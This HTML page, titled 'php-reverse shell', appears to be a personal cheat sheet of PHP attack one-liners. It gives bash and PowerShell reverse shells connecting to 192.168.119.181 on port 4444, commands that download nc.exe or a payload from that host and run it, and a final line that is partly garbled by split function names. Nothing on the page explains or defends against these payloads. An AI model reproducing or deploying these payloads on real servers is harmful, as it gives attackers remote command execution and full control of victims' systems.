<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>php-reverse shell</title>
</head><body>&lt;?php shell_exec("/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.119.181/4444 0&gt;&amp;1'");?&gt;<br/>
<br/>
<br/>
&lt;?php <br/>
print system("/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.119.181/4444 0&gt;&amp;1'");<br/>
?&gt;<br/>
<br/>
<br/>
&lt;?php system("powershell -Command \"&amp; {(New-Object System.Net.WebClient).DownloadFile('http://192.168.119.181:8001/nc.exe','nc.exe'); cmd /c nc.exe 192.168.119.181 4444 -e cmd.exe\" }"); ?&gt; &nbsp;#windows PHP Reverse Shell<br/>
<br/>
<br/>
&lt;?php system("wget 192.168.119.181:8001/evil3 -O /tmp/shell.php; php /tmp/shell.php"); ?&gt;<br/>
<br/>
<br/>
<span style="color: #000000"><span style="font-family: Arial"><span style="font-size: 10pt"><b>&lt;?php+file_put_cont ents('nc.bat',file_get_contens('http://&lt;IP&gt;/nc.txt'));system('nc.bat');usleep(2000000);syste m('nc.exe+-vn+&lt;IP&gt;+1234+-cmd.exe');+?&gt;</b></span></span></span>&nbsp; </body></html>